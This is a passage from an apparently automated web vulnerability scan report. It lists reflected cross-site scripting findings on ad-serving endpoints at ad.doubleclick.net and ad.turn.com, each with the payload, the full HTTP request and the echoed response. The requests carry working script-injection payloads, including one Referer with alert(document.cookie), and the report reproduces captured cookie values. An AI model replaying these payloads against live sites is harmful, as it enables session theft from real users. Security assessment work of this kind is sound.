Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 339
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:24:12 GMT
Expires: Mon, 13 Jun 2011 11:24:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/x;234516816;0-0;0;58298669;255-0/0;41773615/41791402/1;;~okv=;net=8e1c4';fe92e006168;~aopt=2/0/e3/0;~sscs=%3fhttp://fightglobalwarming.com">
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/gm.kotaku/e3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/e3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 121ba'%3balert(1)//4948de38c85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 121ba';alert(1)//4948de38c85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/e3;ptile=1;sz=82x50;ord=99858991;mtfIFPath=/assets/vendor/doubleclick/?&121ba'%3balert(1)//4948de38c85=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 403
Date: Mon, 13 Jun 2011 11:23:26 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/q;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=1;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/?&121ba';alert(1)//4948de38c85=1;~aopt=2/0/23/0;~sscs=%3fhttp://kotaku.com/e32011">
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/gm.kotaku/e3 [ptile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/e3

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7570e'%3balert(1)//79459fa1de4 was submitted in the ptile parameter. This input was echoed as 7570e';alert(1)//79459fa1de4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/e3;ptile=7570e'%3balert(1)//79459fa1de4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 351
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:24 GMT
Expires: Mon, 13 Jun 2011 11:23:24 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/q;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=7570e';alert(1)//79459fa1de4;~aopt=2/0/23/0;~sscs=%3fhttp://kotaku.com/e32011">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/gm.kotaku/pax [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pax

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8663'%3balert(1)//2544952d3f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8663';alert(1)//2544952d3f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pax;ptile=2;sz=82x50;ord=15641756;mtfIFPath=/assets/vendor/doubleclick/?&e8663'%3balert(1)//2544952d3f4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 353
Date: Mon, 13 Jun 2011 11:23:42 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=2;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/?&e8663';alert(1)//2544952d3f4=1;~aopt=2/0/23/0;~sscs=%3f">
...[SNIP]...

4.31. http://ad.doubleclick.net/adj/gm.kotaku/pax [ptile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pax

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccf35'%3balert(1)//9bde8de0ddd was submitted in the ptile parameter. This input was echoed as ccf35';alert(1)//9bde8de0ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pax;ptile=ccf35'%3balert(1)//9bde8de0ddd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:39 GMT
Expires: Mon, 13 Jun 2011 11:23:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=ccf35';alert(1)//9bde8de0ddd;~aopt=2/0/23/0;~sscs=%3f"><
...[SNIP]...

4.32. http://ad.doubleclick.net/adj/gm.kotaku/pc [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pc

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e201'-alert(1)-'d992d7999dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pc;ptile=9;sz=300x250;ord=45018742;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku?&9e201'-alert(1)-'d992d7999dd=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 371
Date: Mon, 13 Jun 2011 11:23:55 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/c;44306;0-0;0;35460738;4307-300/250;0/0/0;;~okv=;ptile=9;sz=300x250;mtfIFPath=/assets/vendor/doubleclick/;origin=kotaku;;9e201'-alert(1)-'d992d7999dd=1;~aopt=2/0/23/0;~sscs=%3f">
...[SNIP]...

4.33. http://ad.doubleclick.net/adj/gm.kotaku/pc [ptile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gm.kotaku/pc

Issue detail

The value of the ptile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7dc'%3balert(1)//92389b75efb was submitted in the ptile parameter. This input was echoed as 5b7dc';alert(1)//92389b75efb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/gm.kotaku/pc;ptile=5b7dc'%3balert(1)//92389b75efb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/static/ad_iframe.php?script_url=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fgm.kotaku%2Fpc%3Bptile%3D9%3Bsz%3D300x250%3Bord%3D45018742%3BmtfIFPath%3D%2Fassets%2Fvendor%2Fdoubleclick%2F%3Borigin%3Dkotaku%3F&rand=45018732&nocache=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 301
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:50 GMT
Expires: Mon, 13 Jun 2011 11:23:50 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/i;44306;0-0;0;35460738;8058-82/50;0/0/0;;~okv=;ptile=5b7dc';alert(1)//92389b75efb;~aopt=2/0/23/0;~sscs=%3f"><
...[SNIP]...

4.34. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/oiq.rmx/

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bf9'-alert(1)-'58be3394590 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/oiq.rmx/;click0=45bf9'-alert(1)-'58be3394590 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:20:12 GMT
Expires: Mon, 13 Jun 2011 11:20:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/14/1c/%2a/k;227869823;0-0;0;40342997;4307-300/250;37969296/37987053/1;;~sscs=%3f45bf9'-alert(1)-'58be3394590http://owneriq.com/advertisers?src=300x250_blue">
...[SNIP]...

4.35. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91fc2"><script>alert(1)</script>25500fb9c25 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=91fc2"><script>alert(1)</script>25500fb9c25&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27438&s=27439
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=-7D3jhve-_dqBXor_KGJlXkh6uMLiJASzHFQS38JXoTG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ9aseWXXyEg6ngdmdtCJ98TaaCzQk38mLAksW0DqSbPYbySfUM3MRmwu87R_bnrJOV4gv5uh11F4sQPDcy793aXQyWberVE7H9dGuTlyTFp3RaUANT5eBsokdVPtiFhbZlnsCNKZNegbrth_D7SWf8-GRakhudMFH92bLqvo7whZCttHGvuJqzUmN3TCnRRWA9RzbA2m8y8-md7vvpCypQN__nnhKkgreG7OSDcaZV8DtILSxhIqj1_8W_b-sPL2rmo28BWvcjGNUxT50RKm6bHeo49rmT7jj-OFCxy7LUUTGOKwgYTlqkzoPyBtxx8IAv5QN-B4qn85KrWNXkRxjrbOKBw1n7GMckFqA6EpnplKzaOHG6TZ2deht-u0YLfBKH6Pa-p1gEeo6-aXDdZFMAmjhzhGEdbwvglvH0-24dOZTOW2rPb1SgA4pngxLGaQQtnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlLz4BQlJ6csz8dB0J_8c8Ka0J_7oKjjzxbQbmixkRIYsAMcBeVd41aCv5NIHe_tLft3hmpmMKAwSnUY_W2vbKxi5DYHhi24I8waLdyGYBf3-MaTnGr8K_HGinZrBfbZveONlgZZNIb4imigs__tVs5_-ofKtZ6hXXSZpdwBNj6GJboI-S1pQlAm9WAm2qWReCcDoZ7E02XMENjv3ClnVh50sfKj_XnOycnqr1f-q8U8AE4G03BTk0fzq7l2lZkr8VkAgj7Wkf7Z-tgLIpA1wB2yzoRrgUiaRdOvE17AKUsymItYwTHyhwXAUBXi6D6PqPXyEGeO1Zz6qPU8NhJ7wMtVPQFf5dsx4yIMgZcA57lrmBiIHuEACwgcsGnk3f55POjRgsWdgnGrl2gT_wrbiSH9GS32-3vC2xqxP7e5vHxFUGj7jmQul9hhXiSWuClGE3RPf0vY5j10d73GHcIzZGN7ew5Q1a2Jatefo_kPZe9ev4zG24J2Kc93KYfJqWJL5G-XhStGducGUCpASNzOmiggs84qnGaLTJJhRTIpFjT7WIs2Qp4sZFseTH4XqopbjkCcflfgayr40dr4ggTgLxRYlq-sDEfjhI0bEAhsL4dT5tAwWq2UVacc2NOW6nmLabkc3sJNc7e1BoJUkxklm2VAglnp_rMWjHAhM9k1KaSm8OWsPIHPqgUorS3Sa63Z4dXkNgeGLbgjzBot3IZgF_f43q0orUcCB1pzamJnrHZbwDgKuBt10k4qS0Y4XqmheDZzWncGPQ-obDcn4rklvspcF4T1MvNY3wH8WmfBVBADewOhnsTTZcwQ2O_cKWdWHnRHnW0MvCAdVOvB_H5-CgFPTgbTcFOTR_OruXaVmSvxWaotkZUMh8YO2CDHSkuQHNvpYL9IxVdLMAO0ccWwxLTWi1jBMfKHBcBQFeLoPo-o9Ug56BpCRUAZFpmVCXZ3Qd10ruuV1lK6btQ_JxbV8gRwSuoy0wOsY4RyZOeRLXa79L_0UruZ7SQ7nDOH3_UpK9C1uwMA7iZtQ-ABBZnlRLpDLQa3T1jvMzxa6vvkjDgWIUGmyDGPkmTeStGjtZLZBTYqFNU9MJ5YE_zpkKWEn7owTls_2Ri7Iyye7TGUfqeyZ5eFK0Z25wZQKkBI3M6aKCA6vC23uVfJ0RdBdeAtvHyQizZCnixkWx5MfheqiluOQGlg-ItAIsZxzqSPRpmEAmoRmAytNEC5X_1tKtPKPo9q_E6bbLezcAxfHFhLtj9YhI3avFK_HA-CwpQ_ryY3RW2I4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIdyIarOzLznCpjY3H8bdib18klrWFfTp2Nb1WaOVWuPLHxJelnxED3MVl_uERX9gK5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4i5vLq95iSQ2aeieaQBbTOIlboYXPkW8MWo4rGR69X3pWLxNksW9701Q8uH9_xMEPefznIrlo3WqyPN2D7Ebz9IitcUhJWLMqI_ZYtAMVlGLMrXFISVizKiP2WLQDFZRizK1xSElYsyoj9li0AxWUYsytcUhJWLMqI_ZYtAMVlGLMaPnwPi2iKD7qRkIeSQCAppTiYieerdsyfHnQplwsVNkkPGTOkzPwCUhGIeJybbU25tEjavJfHgFGxLIy_cdxU; fc=mVeMhp7-ld4_XVGY83oSyV3hWUCDbGhmmT9X_UI3cPCqlZbi8OtpyiRwC3bGcdNYqLcvXewLkRbbhMxP5KrQ6js1B_gXcB-qUuts5vF-XAQJlqbR_nvs1sBCEK8H0zsggHYjhoCFjnYm98tOIGVnz9yTqQnfFF8yP7lyDdApkMNbSdeeg1n_QtTgQFvfHLFQT9zwFbWJbyuxwzjlcHRJHBCWkGjVFo180HpWwPYRgVebRjcEB4F4-tbn-dbadQ3U2hGJYNwpXrvgU2zjApqVDS_ZolmR3JdiZaysD2zF72o; pf=KIMUptIal9Nliw08sJTQpzrAikl_fVScFd4qmGyTXES6o4VUW939ncJz_M9dzB62UmrMBVMpgSsIblFazRSHFvyNJGSTFQowtlkWEXspEEWyUA8lyShqTNjLCWmR35lQAe0q7YBFq60qdkok49Ub4icsZdLX4b0PU7FeYXqY03oQHhICh13Elq4vwAwd9rb_XWux54k9t4WxZeFvO_AmtBGWCx2R5xgPC_s5kwxYv523cpL3MMGZNZjM0sSgc3mUjHLQ52r_73tBHOt9AwJrvZSqu2QLfhe55HtMHLH7N4dkI6rwS_FFgauEgoqML85x-1Q3I8oslvAtuyyBsRV6-fzGtf-psK3vfYzM0TUbrRG6q-YPtF8T5YI7kk_i1ZmwdQvGUDdnJ9Q7wqHvVSgCUe7QnJne7ClW0JjJrTY14UTX0rL3iR-kLOOVUOxvehKvsHdHnq4okb07IhP8RrNrcwgNI19g506sy3_lUJPsfl8CGpZK0GFVXeLagp8b1KheELIeEizlDhW6ALtV-GQktuNrQgY57q_B3M-YWTk5qHl07ZpIsC5rrDcwqi2ouvVPptSDGP-GxrCvh-LDjgUd8ZWn7eX_qShrxTbEz_JoQSgkazJjbqogOCGJzp2JwtRxDWW37YD88Oq2q3BJWHMgKp-8bXaWq_ZlUx6tQG9MYgzWnuhICg6DCwbzB8f7O2jIvbxrd5gRo7UNJEp0C8RZD92mAEbpo7VKVZrCc_AFXuEw4VIHl-z6HMGQRzQICMRhyuiZtIpWBYJtFLLA7SWXOYEU1_XIPwT1jfR4VPfRTv6qsLf6D_fnIicUB0pybsIJ2dSqszIzCHMknU-DzVWrNDFM0eGdpjiZO9Ug6jvGBWHuwWjoa3XnE-vhUMqDroQX2i6VQ6o_vJB_s4peYdQHY3PMMUyh2TsgW_znILL-KMVz13JtznmvyeJM_Daav9q-XnC1B7eE2tx0YggEyRGivFBamygjHG5s3uqc4ZO0Su8slXBOHELwL_WMS1ltJh96VLEo5_Rdhy_O_2EbMTxTAB0QzSJLUYL8bvwf_ltWWx49gVG3YRVwjUzsS8cC9tu6PidGJMqmtISA_uBS2GO5emL721cN01WezRNF3l2Jos_32v1JcRdapCworTlW2GnMExs5_u_TEM0IsgE042YcjSnppdr0odeZIIibPByrMIei80W5BDQQmmuXn2BLK2L9VtuwCf0POxmlxjYSO1lO1I6hKPYFh4mC6TZ40m4ac8DKhk2RFegnRLefeZzr8xfHFa7v9HA91JbM5tgynojFu8fmABjZRVBOjbBfTb6Ls-mWBj_6dVFVYBPegaB9ftcm142azN2X6FZLfxHmAJn-TJniBnp3df3A41qYmrDHKEZZ3bqhSTU4dzKj-8nCSiEIK8MjEnLFmwlewonlU5AzOKYGFzmSaC07WQoOi1NX0_sHM7t1P_oDF3ijSQ_b3u4oeJKmVFGrK9unqqF0v5SN3KLim53Jf3v8Px0gg3kgqLE88BFAvW1TPuVrz5YTyJR7pzkVyYP8gQOuOeXedZf-9w; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:19:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:19:44 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=8175950172996030282&fpid=91fc2"><script>alert(1)</script>25500fb9c25&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.36. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38b"><script>alert(1)</script>52781f3e18 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=1d38b"><script>alert(1)</script>52781f3e18 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
